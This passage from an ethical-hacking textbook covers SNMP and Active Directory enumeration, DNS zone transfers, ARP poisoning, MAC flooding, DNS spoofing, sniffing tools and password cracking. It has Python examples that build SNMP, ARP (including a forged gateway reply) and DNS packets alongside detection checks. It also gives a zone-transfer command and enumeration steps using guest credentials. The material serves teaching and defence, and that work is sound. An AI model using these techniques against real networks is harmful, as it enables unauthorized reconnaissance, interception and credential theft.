SNMP enumeration is the process of using SNMP to enumerate user
accounts, shares and network configuration on a target system. The
Simple Network Management Protocol is used to manage and monitor
hardware devices connected to a network. An SNMP-managed network
consists of three key components:
Network Management System (NMS): software that runs on the master
(manager) station
SNMP agent: software that runs on each managed (slave) device
Managed device: the device on which an agent is deployed
The managed devices record information and, through the deployed
agent, communicate with the overarching Network Management System.
This information is stored in a Management Information Base (MIB). A
managed device is a network node that implements an SNMP interface
that allows unidirectional (read-only) or bidirectional (read/write)
access to node-specific information. Managed devices exchange
node-specific information with the NMSs. Sometimes called network
elements, the managed devices can be any type of device, including, but
not limited to, routers, access servers, switches, bridges, hubs, IP
telephones, computer hosts, and printers.
An agent is a network-management software module that resides on a
managed device. An agent has local knowledge of management
information and translates that information to or from an SNMP specific
form.
A network management system (NMS) executes applications that
monitor and control managed devices. NMSs provide the bulk of the
processing and memory resources required for network management.
One or more NMSs may exist on any managed network.
SNMP versions 1 and 2c are dangerous because they are clear-text
protocols: anyone who can sniff the traffic learns the community
string, and the responses themselves hand valuable information to an
attacker. SNMPv3 adds per-user authentication and optional encryption
and should be used wherever the devices support it.
You may have heard of SNMP community strings; the defaults are "public"
and "private". If you use SNMP in your domain, these must be changed,
as they are the first strings an attacker will try in order to gain
information about your network and, more dangerously, control over your
hardware.
Another term of note is SNMP traps: unsolicited notifications that an
agent sends to the management station when something significant
happens. Agents listen for requests on UDP port 161; the management
station receives traps on UDP port 162.
Almost all network infrastructure devices, such as routers and switches
and including Windows systems, contain an SNMP agent to manage the
system or device. The SNMP management station sends requests to
agents, and the agents send back replies. The requests and replies refer
to configuration variables accessible by agent software. Management
stations can also send requests to set values for certain variables. Traps
let the management station know that something significant has
happened in the agent software such as a reboot or an interface failure.
Management Information Base (MIB) is the database of configuration
variables, which resides on the networking device. SNMP has two
passwords you can use to access and configure the SNMP agent from the
management station.
The first is called a read community string. This password lets you view
the configuration of the device or system.
The second is called the read/write community string; it’s for changing
or editing the configuration on the device.
Generally, the default read community string is public and the default
read/write community string is private. A common security loophole
occurs when the community strings are left at the default settings: A
hacker can use these default passwords to view or change the device
configuration.
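To see what "clear text" means on the wire, the following added Python example (written for this page, not taken from the original text or from any SNMP library) builds an SNMPv1 GetRequest for sysDescr.0 with the BER encoding SNMP uses, parses it back, and flags a default community string the way a sniffer display filter or an IDS rule would. The packet bytes, the community strings and the sysDescr reply text are constructed inside the script; nothing is sent on the network.

```python
# Added example: a minimal SNMPv1 encoder/decoder (BER) showing the community
# string and OIDs exactly as they travel in the UDP payload.
SEQ, INT, OCTSTR, NULL, OID = 0x30, 0x02, 0x04, 0x05, 0x06
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse", 0xA3: "SetRequest"}
DEFAULT_COMMUNITIES = {"public", "private"}   # the strings an attacker tries first


def ber_len(n):
    """BER length octets: short form below 128, long form (0x8N + N bytes) otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, body):
    return bytes([tag]) + ber_len(len(body)) + body


def enc_int(v):
    """Two's-complement INTEGER in the minimal number of bytes."""
    n = 1
    while not -(1 << (8 * n - 1)) <= v < (1 << (8 * n - 1)):
        n += 1
    return tlv(INT, v.to_bytes(n, "big", signed=True))


def enc_oid(oid):
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128 with continuation bits."""
    arcs = [int(a) for a in oid.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.append(0x80 | (a & 0x7F))
            a >>= 7
        out += bytes(reversed(chunk))
    return tlv(OID, bytes(out))


def enc_value(v):
    if v is None:
        return tlv(NULL, b"")            # GetRequest varbinds carry NULL values
    if isinstance(v, int):
        return enc_int(v)
    return tlv(OCTSTR, v.encode())


def build_pdu(pdu_tag, community, varbinds, request_id=1, version=0):
    """Message = SEQ { version, community, PDU { request-id, error-status, error-index, SEQ of varbinds } }."""
    vbl = b"".join(tlv(SEQ, enc_oid(o) + enc_value(v)) for o, v in varbinds)
    pdu = tlv(pdu_tag, enc_int(request_id) + enc_int(0) + enc_int(0) + tlv(SEQ, vbl))
    return tlv(SEQ, enc_int(version) + tlv(OCTSTR, community.encode()) + pdu)


def build_get_request(community, oids, request_id=1):
    return build_pdu(0xA0, community, [(o, None) for o in oids], request_id)


def read_tlv(buf, pos):
    """Return (tag, body, position after the element), handling long-form lengths."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln


def dec_oid(b):
    arcs, v = [b[0] // 40, b[0] % 40], 0
    for x in b[1:]:
        v = (v << 7) | (x & 0x7F)
        if not x & 0x80:
            arcs.append(v)
            v = 0
    return ".".join(map(str, arcs))


def parse_snmp(pkt):
    """Decode version, community, PDU type, request id and varbinds of an SNMPv1/v2c message."""
    _, msg, _ = read_tlv(pkt, 0)
    _, ver, pos = read_tlv(msg, 0)
    _, comm, pos = read_tlv(msg, pos)
    pdu_tag, pdu, _ = read_tlv(msg, pos)
    _, rid, pos = read_tlv(pdu, 0)
    _, _, pos = read_tlv(pdu, pos)       # error-status
    _, _, pos = read_tlv(pdu, pos)       # error-index
    _, vbl, _ = read_tlv(pdu, pos)
    varbinds, pos = [], 0
    while pos < len(vbl):
        _, vb, pos = read_tlv(vbl, pos)
        _, oid, q = read_tlv(vb, 0)
        vtag, val, _ = read_tlv(vb, q)
        if vtag == OCTSTR:
            value = val.decode(errors="replace")
        elif vtag == INT:
            value = int.from_bytes(val, "big", signed=True)
        else:
            value = None if vtag == NULL else val
        varbinds.append((dec_oid(oid), value))
    return {"version": int.from_bytes(ver, "big", signed=True),
            "community": comm.decode(errors="replace"),
            "pdu": PDU_NAMES.get(pdu_tag, hex(pdu_tag)),
            "request_id": int.from_bytes(rid, "big", signed=True),
            "varbinds": varbinds}


def uses_default_community(pkt):
    """The check a sniffer filter or IDS rule makes: is the clear-text community a default one?"""
    return parse_snmp(pkt)["community"] in DEFAULT_COMMUNITIES


if __name__ == "__main__":
    req = build_get_request("public", ["1.3.6.1.2.1.1.1.0"], request_id=42)
    print(req.hex())                        # "public" is readable in the bytes
    print(parse_snmp(req), uses_default_community(req))
    # constructed reply, as an agent would answer sysDescr.0 (text is made up)
    rsp = build_pdu(0xA2, "public", [("1.3.6.1.2.1.1.1.0", "Hardware: x86 - Windows 2000 Version 5.0")], 42)
    print(parse_snmp(rsp)["varbinds"])
```

The output of build_get_request() can be sent to UDP port 161 with a plain socket, and the agent's GetResponse decodes with parse_snmp(); the point to notice is that the community string sits in the packet as an ordinary OCTET STRING, which is why SNMPv1/v2c must never cross an untrusted network with a default or reused community.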
6.5.1. SNMP Enumeration Tools
SNMPUtil and IP Network Browser are SNMP enumeration tools.
i. SNMPUtil gathers Windows user account information via SNMP in
Windows systems. Some information such as routing tables, ARP
tables, IP addresses, MAC addresses, TCP and UDP open ports,
user accounts, and shares can be read from a Windows system
that has SNMP enabled using the SNMPUtil tools.
ii. IP Network Browser from the SolarWinds toolset also uses SNMP
to gather more information about a device that has an SNMP
agent.
6.5.2. SNMP Enumeration Countermeasures
The simplest way to prevent SNMP enumeration is to remove the SNMP
agent from the potential target systems or turn off the SNMP service.
If shutting off SNMP isn't an option, then change the default read and
read/write community names to long, unguessable values, and restrict
the agent to accepting requests only from the management station's
address. On Windows both settings live on the Security tab of the SNMP
Service properties (the accepted community names and the "Accept SNMP
packets from these hosts" list). Block UDP port 161 at the perimeter
and, where the devices support it, move to SNMPv3 with authentication
and privacy enabled. The "Additional restrictions for anonymous
connections" policy discussed under null sessions does not affect SNMP;
the SNMP service has its own access controls.
6.6. Windows 2000 DNS Zone Transfer
In a Windows 2000 domain, clients use service (SRV) records to locate
Windows 2000 domain services, such as Active Directory and Kerberos.
This means every Windows 2000 Active Directory domain must have a
DNS server for the network to operate properly.
A simple zone transfer performed with the nslookup command can
enumerate lots of interesting network information. In nslookup's
interactive mode the command is ls -d followed by the zone name (after
pointing nslookup at the zone's authoritative server with the server
command); ls -d asks for a transfer of the whole zone, which the server
only honours if it permits zone transfers to your address:
nslookup
> ls -d domainname
Within the nslookup results, an attacker looks closely at the following
records, because they reveal where the network services are:
Global Catalog service (_gc._tcp)
Domain controllers (_ldap._tcp)
Kerberos authentication (_kerberos._tcp)
As a countermeasure, zone transfers can be restricted to named
secondary servers, or blocked entirely, on the Zone Transfers tab of
the zone's properties in the Windows DNS console. An Active Directory
database is a Lightweight Directory Access Protocol (LDAP) based
database. This allows the existing users and groups in the database to
be enumerated with a simple LDAP query. The only thing required to
perform this enumeration is an authenticated LDAP session. A Windows
2000 LDAP client called the Active Directory Administration Tool
(ldp.exe) connects to an Active Directory server and displays the
contents of the database. You can find ldp.exe on the Windows 2000
CD-ROM in the Support\Reskit\Netmgmt\Dstool folder.
To perform an Active Directory enumeration attack, a hacker performs
the following steps:
1. Connect to any Active Directory server using ldp.exe on port 389.
When the connection is complete, server information is displayed in
the right pane.
2. On the Connection Menu, choose to authenticate. Type the
username, password, and domain name in the appropriate boxes.
You can use the Guest account or any other domain account.
3. Once the authentication is successful, enumerate users and built-in
groups by choosing the Search option from the Browse menu.
6.7. Enumeration Countermeasures
Use the following checklist of countermeasures to effectively reconfigure
your Internet-facing systems not to give away potentially sensitive
information:
Configure web servers to prevent indexing of directories that don't
contain index.html or similar index files (default.asp under IIS, for
example). Also ensure that sensitive documents and files aren't kept on
publicly accessible hosts, such as HTTP or FTP servers.
Always use a generic, centralized network administration
contact detail (such as an IT help desk) in Network Information
Center databases, to prevent potential social engineering and
war dialing attacks against IT departments from being effective.
Configure all name servers to disallow DNS zone transfers to
untrusted hosts.
Ensure that nonpublic hostnames aren't referenced to IP
addresses within the DNS zone files of publicly accessible DNS
servers, to prevent reverse DNS sweeping from being effective.
This practice is known as split horizon DNS, using separate
DNS zones internally and externally.
Ensure that HINFO and other novelty records don't appear in
DNS zone files.
Configure SMTP servers either to ignore email messages to
unknown recipients or to send responses that don't include the
following types of information:
Details of mail relay systems being used (such as Sendmail
or MS Exchange).
Internal IP address or host information.
CHAPTER 7
SNIFFERS
Objective
7.1 Introduction of Sniffing
7.2 Types of Sniffing
7.3 Sniffing Protocols
7.4 Sniffing Tools
7.5 Countermeasures
7.1. Introduction of Sniffing [51]
A sniffer can be a packet-capturing or frame-capturing tool. It
intercepts traffic on the network and displays it in either a
command-line or GUI format for a hacker to view. Some sophisticated
sniffers interpret the packets and can reassemble the packet stream
into the original data, such as an e-mail or a document. Sniffers are
used to capture traffic sent between two systems. Depending on how the
sniffer is used and the security measures in place, a hacker can use a
sniffer to discover usernames, passwords, and other confidential
information transmitted on the network. Several hacking attacks and
various hacking tools require the use of a sniffer to obtain important
information sent from the target system. This chapter will describe how
sniffers work and identify the most common sniffer hacking tools.
[51] Book: CEH: Official Certified Ethical Hacker Review Guide by Kimberly Graves
7.2. Types of Sniffing
7.2.1.Passive Sniffing
Passive sniffing involves listening and capturing traffic, and is useful in a
network connected by hubs. In networks that use hubs or wireless media
to connect systems, all hosts on the network can see all traffic; therefore
a passive packet sniffer can capture traffic going to and from all hosts
connected via the hub.
7.2.2.Active Sniffing
Active sniffing involves launching an Address Resolution Protocol
(ARP) spoofing or traffic-flooding attack against a switch in order to
capture traffic. A switched network operates differently. The switch looks
at the data sent to it and tries to forward packets to their intended
recipients based on MAC address. The switch maintains a MAC table of
all the systems and the port numbers to which they’re connected. This
enables the switch to segment the network traffic and send traffic only to
the correct destination MAC addresses. [52]
[52] http://ethicalhacking.org.ua/8794final/lib0025.html
7.3. Protocols Responsible For Sniffing
7.3.1.ARP Poisoning
ARP (Address Resolution Protocol) allows the network to translate IP
addresses into MAC addresses. When one host using TCP/IP on a LAN
tries to contact another, it needs the MAC address or hardware address
of the host it’s trying to reach. It first looks in its ARP cache to see if it
already has the MAC address; if it doesn’t, it broadcasts an ARP request
asking, “Who has the IP address I’m looking for?” If the host that has
that IP address hears the ARP query, it responds with its own MAC
address, and a conversation can begin using TCP/IP.
ARP poisoning is a technique that’s used to attack an Ethernet network
and that may let an attacker sniff data frames on a switched LAN or stop
the traffic altogether. ARP poisoning utilizes ARP spoofing where the
purpose is to send fake, or spoofed, ARP messages to an Ethernet LAN.
These frames contain false MAC addresses that confuse network devices
such as network switches. As a result, frames intended for one machine
can be mistakenly sent to another (allowing the packets to be sniffed) or
to an unreachable host (a Denial of Service [DoS] attack). ARP spoofing
can also be used in a man-in-the-middle attack in which all traffic is
forwarded through a host by means of ARP spoofing and analyzed for
passwords and other information.
To prevent ARP spoofing on a single host, permanently add the MAC
address of the gateway to that host's ARP cache. On a Windows system
this is done with the arp -s command, giving the gateway's IP and MAC
addresses (for example arp -s 192.168.1.1 00-11-22-33-44-01). Doing so
stops an attacker from overwriting that entry to perform ARP spoofing
against the system, but it is hard to manage in a large environment
because of the number of systems. In an enterprise environment,
port-based security can be enabled on a switch to allow only one MAC
address per switch port, and switches that support Dynamic ARP
Inspection (DAI) can drop ARP replies whose IP-to-MAC binding does not
match the DHCP snooping table.
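To make the attack and the countermeasure concrete, the following added Python example (written for this page; not part of the original text and not taken from arpspoof, Cain & Abel or any other tool named in this chapter) builds ARP reply frames byte for byte and runs a small watcher over them. The watcher learns IP-to-MAC bindings from traffic and raises an alert when a reply contradicts a static gateway binding, which is what a host with an arp -s entry, or a switch running DAI, would refuse to accept. All MAC and IP addresses are constructed for the example and nothing is transmitted.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac(s):
    return bytes.fromhex(s.replace(":", "").replace("-", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip(s):
    return bytes(int(o) for o in s.split("."))


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip, dst_mac=None):
    """Ethernet II frame carrying an ARP request (op=1) or reply (op=2).
    Requests are broadcast; replies go to the target unless dst_mac overrides it."""
    if dst_mac is None:
        dst_mac = "ff:ff:ff:ff:ff:ff" if op == ARP_REQUEST else target_mac
    eth = mac(dst_mac) + mac(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)      # htype, ptype, hlen, plen, opcode
           + mac(sender_mac) + ip(sender_ip) + mac(target_mac) + ip(target_ip))
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"eth_dst": mac_str(frame[:6]), "eth_src": mac_str(frame[6:12]), "op": op,
            "sender_mac": mac_str(frame[22:28]), "sender_ip": ip_str(frame[28:32]),
            "target_mac": mac_str(frame[32:38]), "target_ip": ip_str(frame[38:42])}


class ArpWatch:
    """Tracks IP-to-MAC bindings seen in ARP traffic. `static` plays the role of the
    arp -s entries (or a DAI binding table): any reply that contradicts one is an alert."""

    def __init__(self, static=None):
        self.static = {k: v.lower() for k, v in (static or {}).items()}
        self.seen = dict(self.static)
        self.alerts = []

    def feed(self, frame):
        a = parse_arp(frame)
        if a is None:
            return None
        ip_addr, claimed = a["sender_ip"], a["sender_mac"]
        if a["eth_src"] != claimed:      # forged ARP payload inside a frame from another MAC
            self.alerts.append(f"{ip_addr}: ARP sender {claimed} differs from Ethernet source {a['eth_src']}")
        known = self.seen.get(ip_addr)
        if known is None:
            self.seen[ip_addr] = claimed     # first sighting: learn it
        elif known != claimed:
            kind = "static" if ip_addr in self.static else "learned"
            self.alerts.append(f"{ip_addr}: {kind} binding {known} contradicted by {claimed} (op={a['op']})")
        return a


def run_demo():
    """Constructed scenario: a genuine gateway reply, then an attacker claiming the gateway's IP."""
    gw_ip, gw_mac = "192.168.1.1", "00:11:22:33:44:01"
    victim_ip, victim_mac = "192.168.1.50", "00:11:22:33:44:50"
    attacker_mac = "00:aa:bb:cc:dd:ee"
    watch = ArpWatch(static={gw_ip: gw_mac})
    frames = [
        build_arp(ARP_REQUEST, victim_mac, victim_ip, "00:00:00:00:00:00", gw_ip),
        build_arp(ARP_REPLY, gw_mac, gw_ip, victim_mac, victim_ip),        # legitimate answer
        build_arp(ARP_REPLY, attacker_mac, gw_ip, victim_mac, victim_ip),  # poisoning attempt
    ]
    for f in frames:
        watch.feed(f)
    return watch.alerts


if __name__ == "__main__":
    for alert in run_demo():
        print("ALERT", alert)
```

Without the static entry the watcher would have learned the attacker's binding only if it arrived first, which is exactly why a learned-only ARP cache is easy to poison and why the gateway entry is the one worth pinning.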
7.3.2.MAC Flooding
A packet sniffer on a switched network can’t capture all traffic as it can
on a hub network; instead, it captures either traffic coming from or
traffic going to the system. It’s necessary to use an additional tool to
capture all traffic on a switched network. There are essentially two ways
to perform active sniffing and make the switch send traffic to the system
running the sniffer: ARP spoofing and flooding. As mentioned earlier,
ARP spoofing involves taking on the MAC address of the network gateway
and consequently receiving all traffic intended for the gateway on the
sniffer system.
A hacker can also flood a switch with frames from so many forged
source MAC addresses that its MAC address table fills up; the switch
can no longer learn where hosts are and starts flooding frames out of
every port, just as a hub would. This active sniffing attack allows the
system with the sniffer to capture all traffic on the network.
7.3.3.DNS Spoofing
When a user requests a certain website URL, the address is looked up on
a DNS server to find the corresponding IP address. If the DNS server has
been compromised, the user is redirected to a website other than the one
that was requested, such as a fake website.
To perform a DNS attack, the attacker exploits a flaw in the DNS server
software that makes it accept incorrect information. If the server
doesn't correctly validate DNS responses (checking that a response
matches an outstanding query's transaction ID, source port and question
section, and that it comes from the server that was asked), it ends up
caching the incorrect entries locally and serving them to users that
make subsequent requests. This technique can be used to replace
arbitrary content for a set of victims with content of an attacker's
choosing.
For example, an attacker poisons the IP addresses DNS entries for a
target website on a given DNS server, replacing them with the IP address
of a server the hacker controls. The hacker then creates fake entries for
files on this server with names matching those on the target server.
These files may contain malicious content, such as a worm or a virus. A
user whose computer has referenced the poisoned DNS server is tricked
into thinking the content comes from the target server and unknowingly
downloads malicious content. The types of DNS spoofing techniques are
as follows:
Intranet spoofing—acting as a device on the same internal network.
Internet spoofing—acting as a device on the Internet.
Proxy server DNS poisoning—modifying the DNS entries on a proxy
server so the user is redirected to a different host system.
DNS cache poisoning—modifying the DNS entries on any system so the
user is redirected to a different host.
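The SRV records read out of a zone transfer in section 6.6 and the response validation that fails in the cache-poisoning attack above share one wire format, so a single added Python example covers both. It is written for this page and is not taken from nslookup, ldp.exe or any DNS library: it encodes and decodes DNS messages (including name compression), pulls the domain-controller, KDC and global-catalog hosts out of SRV answers the way an attacker reads a transfer, and applies the checks a resolver must make before caching a response (transaction ID, QR bit, question section, source address). The zone corp.example, its hosts and the addresses are constructed for the example; the script builds every packet itself and sends nothing.

```python
import struct

QTYPE_A, QTYPE_SRV = 1, 33
# Active Directory service-locator prefixes an attacker looks for in a zone listing
AD_SERVICES = {"_ldap._tcp": "domain controller",
               "_kerberos._tcp": "Kerberos KDC",
               "_gc._tcp": "global catalog"}


def enc_name(name):
    out = b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split("."))
    return out + b"\x00"


def dec_name(msg, pos):
    """Decode a name at pos, following compression pointers; returns (name, pos after it)."""
    labels, end = [], None
    while True:
        l = msg[pos]
        if l & 0xC0 == 0xC0:                         # pointer to an earlier name in the message
            if end is None:
                end = pos + 2
            pos = struct.unpack("!H", msg[pos:pos + 2])[0] & 0x3FFF
            continue
        pos += 1
        if l == 0:
            break
        labels.append(msg[pos:pos + l].decode())
        pos += l
    return ".".join(labels), (pos if end is None else end)


def build_query(txid, name, qtype):
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + enc_name(name) + struct.pack("!HH", qtype, 1)


def build_response(txid, name, qtype, rdatas, ttl=600):
    """Standard response; each answer's owner name is a pointer (0xC00C) to the question name."""
    msg = struct.pack("!HHHHHH", txid, 0x8180, 1, len(rdatas), 0, 0) + enc_name(name) + struct.pack("!HH", qtype, 1)
    for rd in rdatas:
        msg += b"\xC0\x0C" + struct.pack("!HHIH", qtype, 1, ttl, len(rd)) + rd
    return msg


def srv_rdata(priority, weight, port, target):
    return struct.pack("!HHH", priority, weight, port) + enc_name(target)


def parse_message(msg):
    txid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", msg[:12])
    pos, questions, answers = 12, [], []
    for _ in range(qd):
        name, pos = dec_name(msg, pos)
        qtype = struct.unpack("!HH", msg[pos:pos + 4])[0]
        pos += 4
        questions.append((name, qtype))
    for _ in range(an):
        name, pos = dec_name(msg, pos)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", msg[pos:pos + 10])
        pos += 10
        start, pos = pos, pos + rdlen
        if rtype == QTYPE_SRV:
            pr, we, po = struct.unpack("!HHH", msg[start:start + 6])
            value = {"priority": pr, "weight": we, "port": po, "target": dec_name(msg, start + 6)[0]}
        elif rtype == QTYPE_A:
            value = ".".join(str(b) for b in msg[start:pos])
        else:
            value = msg[start:pos]
        answers.append((name, rtype, value))
    return {"id": txid, "flags": flags, "questions": questions, "answers": answers}


def ad_roles(response):
    """Map SRV answers such as _ldap._tcp.corp.example to (role, host, port)."""
    roles = []
    for name, rtype, v in parse_message(response)["answers"]:
        if rtype != QTYPE_SRV:
            continue
        for prefix, role in AD_SERVICES.items():
            if name.startswith(prefix + "."):
                roles.append((role, v["target"], v["port"]))
    return roles


def validate_response(query, response, sent_to, received_from):
    """The checks a resolver must make before caching; returns (accepted, reason)."""
    q, r = parse_message(query), parse_message(response)
    if received_from != sent_to:
        return False, "answer came from an address we did not query"
    if r["id"] != q["id"]:
        return False, "transaction ID mismatch"
    if not r["flags"] & 0x8000:
        return False, "QR bit not set"
    if r["questions"] != q["questions"]:
        return False, "question section does not match the query"
    return True, "accepted"


if __name__ == "__main__":
    # constructed zone data for the fictional domain corp.example
    srv = build_response(0x1234, "_ldap._tcp.corp.example", QTYPE_SRV, [srv_rdata(0, 100, 389, "dc1.corp.example")])
    print(ad_roles(srv))
    q = build_query(0x4242, "www.corp.example", QTYPE_A)
    forged = build_response(0x4243, "www.corp.example", QTYPE_A, [bytes([203, 0, 113, 9])])
    print(validate_response(q, forged, "192.0.2.53", "192.0.2.53"))
```

The zone transfer that ls -d performs is a query of type AXFR (252) carried over TCP, and each record in the reply has the layout parse_message() reads, so the same ad_roles() extraction applies to a full listing. The validation function shows why a resolver that skips any one of the four checks is open to the poisoning described above: an attacker who can guess the 16-bit transaction ID only wins if the source port and question are not also matched.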
7.4. Sniffing Tools
i. Ethereal is a freeware sniffer that can capture packets from a
wired or wireless LAN connection. The project has since been
renamed Wireshark. Ethereal is a common and popular program
because it is free, but it has some drawbacks: an untrained user may
find it difficult to write filters in Ethereal to capture only certain
types of traffic.
ii. Snort is an intrusion detection system (IDS) that also has sniffer
capabilities. It can be used to detect a variety of attacks and
probes, such as buffer overflows, stealth port scans, CGI attacks,
Server Message Block (SMB) probes, and OS fingerprinting
attempts.
iii. WinDump is the Windows version of tcpdump, the command-line
network analyzer for Unix. WinDump is fully compatible with
tcpdump and can be used to watch, diagnose, and save to disk
network traffic according to various rules.
iv. EtherPeek is a great sniffer for wired networks with extensive
filtering and TCP/IP conversation tracking capabilities. The latest
version of EtherPeek has been renamed OmniPeek.
v. WinSniffer is an efficient password sniffer. It monitors incoming
and outgoing network traffic and decodes FTP, POP3, HTTP, ICQ,
Simple Mail Transfer Protocol (SMTP), Telnet, Internet Message
Access Protocol (IMAP), and Network News Transfer Protocol
(NNTP) usernames and passwords.
vi. Iris is an advanced data- and network-traffic analyzer that collects,
stores, organizes, and reports all data traffic on a network. Unlike
other network sniffers, Iris is able to reconstruct network traffic,
such as graphics, documents, and e-mails including attachments.
vii. EtherFlood is used to flood an Ethernet switch with traffic to
make it revert to a hub. By doing this, a hacker is able to capture
all traffic on the network rather than just traffic going to and from
their system, as would be the case with a switch.
viii. Dsniff is a collection of Unix-executable tools designed to perform
network auditing as well as network penetration. The following
tools are contained in dsniff: filesnarf, mailsnarf, msgsnarf,
urlsnarf, and webspy. These tools passively monitor a vulnerable
shared network (such as a LAN where the sniffer sits behind any
exterior firewall) for interesting data (passwords, e-mail, files, and
so on).
ix. Sshmitm and webmitm implement active man-in-the-middle
attacks against redirected Secure Shell (SSH) and HTTPS sessions.
x. Arpspoof, dnsspoof, and macof work on the interception of
switched network traffic that is usually unavailable to a sniffer
program because of switching. To get around the layer 2 packet
switching issue, dsniff spoofs the network into thinking that it’s a
gateway that data must pass through to get outside the network.
xi. IP Restrictions Scanner (IRS) is used to find the IP restrictions
that have been set for a particular service on a host. It combines
ARP poisoning with TCP stealth or half-scan technique and
exhaustively tests all possible spoofed TCP connections to the
selected port of the target. IRS can find servers and network
devices like routers and switches and identify access-control
features like access control lists (ACLs), IP filters, and firewall
rules.
xii. sTerm is a Telnet client with a unique feature: It can establish a
bidirectional Telnet session to a target host, without ever sending
the real IP and MAC addresses in any packet. Using ARP
poisoning, MAC spoofing, and IP spoofing techniques, sTerm can
effectively bypass ACLs, firewall rules, and IP restrictions on
servers and network devices.
xiii. Cain & Abel is a multipurpose hacking tool for Windows. It allows
easy recovery of various kinds of passwords by sniffing the
network; cracking encrypted passwords using dictionary, brute
force; recording VoIP conversations; decoding scrambled
passwords; revealing password boxes; uncovering cached
passwords; and analyzing routing protocols. The latest version
contains a lot of new features like ARP Poison Routing (APR), which
enables sniffing on switched LANs and man-in-the-middle attacks.
The sniffer in this version can also analyze encrypted protocols
such as SSH-1 and HTTPS, and it contains filters to capture
credentials from a wide range of authentication mechanisms.
xiv. Packet Crafter is a tool used to create custom TCP/IP/UDP
packets. The tool can change the source address of a packet to do
IP spoofing and can control IP header fields such as the checksum and
TCP fields such as the state flags, sequence numbers, and ack number.
xv. SMAC is a tool to change the MAC address of a system. It lets a
hacker spoof a MAC address when performing an attack.
xvi. MAC Changer is a tool used to spoof a MAC address on Unix. It
can be used to set the network interface to a specific MAC address,
set the MAC randomly, set a MAC of another vendor, set another
MAC of the same vendor, set a MAC of the same kind, or even to
display a vendor MAC list to choose from.
xvii. WinDNSSpoof is a simple DNS ID spoofing tool for Windows. To
use it on a switched network, you must be able to sniff traffic of
the computer being attacked. Therefore it may need to be used in
conjunction with an ARP spoofing or flooding tool.
xviii. Distributed DNS Flooder sends a large number of queries to
create a DoS attack, disabling DNS. If the DNS daemon software logs
incorrect queries, the impact of this attack is amplified.
7.5. Sniffing Countermeasures
The best security defense against a sniffer on the network is encryption.
Although encryption won’t prevent sniffing, it renders any data captured
during the sniffing attack useless because the hacker can’t interpret the
information. Encryption such as AES and RC4 or RC5 can be utilized in
VPN technologies and is a common method to prevent sniffing on a
network.
i. netINTERCEPTOR is a spam and virus firewall. It has advanced
filtering options and can learn and adapt as it identifies new spam.
It also intercepts and quarantines the latest e-mail viruses and
Trojans, preventing a Trojan from being installed and possibly
installing a sniffer.
ii. Sniffdet is a set of tests for remote sniffer detection in TCP/IP
network environments. Sniffdet implements various tests for the
detection of machines running in promiscuous mode or with a
sniffer.
iii. WinTCPKill is a TCP connection termination tool for Windows. The
tool requires the ability to use a sniffer to sniff incoming and
outgoing traffic of the target. In a switched network, WinTCPKill
can use an ARP cache-poisoning tool that performs ARP spoofing.
CHAPTER 8
PASSWORD CRACKING
Objective
8.1 Introduction of Password Cracking
8.2 Attack methods
8.3 Password Cracking Tools
8.4 Web-Based Password Cracking
8.1. Introduction
Password cracking is the process of recovering passwords from data that
has been stored in or transmitted by a computer system. A common
approach is to repeatedly try guesses for the password. The purpose of
password cracking might be to help a user recover a forgotten password,
to gain unauthorized access to a system, or as a preventive measure by
system administrators to check for easily crackable passwords. On a file-
by-file basis, password cracking is utilized to gain access to digital
evidence for which a judge has allowed access but the particular file's
access is restricted.[53]
8.1.1.Password Cracker
A password cracker is a program designed to decrypt passwords or
disable password protection. Password crackers rely on dictionary
attacks or brute-force methods to crack passwords.
8.1.2.How Does a Password Cracker Work?
There are several methods to crack a password, such as dictionary
attack, brute-force attack, salting, pre-computation (rainbow tables),
keyloggers, etc. How a password cracker works with a dictionary attack
is discussed below.
[53] pcmag.com
The first step in a dictionary attack is to generate a list of potential
passwords that can be found in a dictionary. The hacker usually creates
this list with a dictionary generator program or dictionaries that can be
downloaded from the Internet. Next, the list of dictionary words is
hashed or encrypted. This hash list is compared against the hashed
password the hacker is trying to crack. The hacker can get the hashed
password by sniffing it from a wired or wireless network or directly from
the Security Accounts Manager (SAM) or shadow password files on the
hard drive of a system. Finally, the program displays the unencrypted
version of the password. Dictionary password crackers can only discover
passwords that are dictionary words. If the user has implemented a
strong password, then brute-force password cracking can be
implemented. Brute-force password crackers try every possible
combination of letters, numbers, and special characters, which takes
much longer than a dictionary attack because of the number of
permutations.
Passwords to access computer systems are usually stored in a database
so that the system can perform password verification when a user
attempts to log in or access a restricted resource. To preserve
confidentiality of system passwords, the password verification data is
typically not stored in cleartext form, but instead a one-way function is
applied to the password, possibly in combination with other data, and
the resulting value is stored. When a user later attempts to authenticate
by entering the password, the same function is applied to the entered
value and the result is compared with the stored value. If they match,
there is an extremely high probability that the entered password was
correct. For simplicity in this discussion, we will refer to the one-way
function employed as a hash and its output as a hashed password.
Even though functions that create hashed passwords may be
cryptographically secure, possession of the hashed password provides a
quick way to test guesses for the password by applying the one-way
function to each guess, and comparing the result to the verification data.
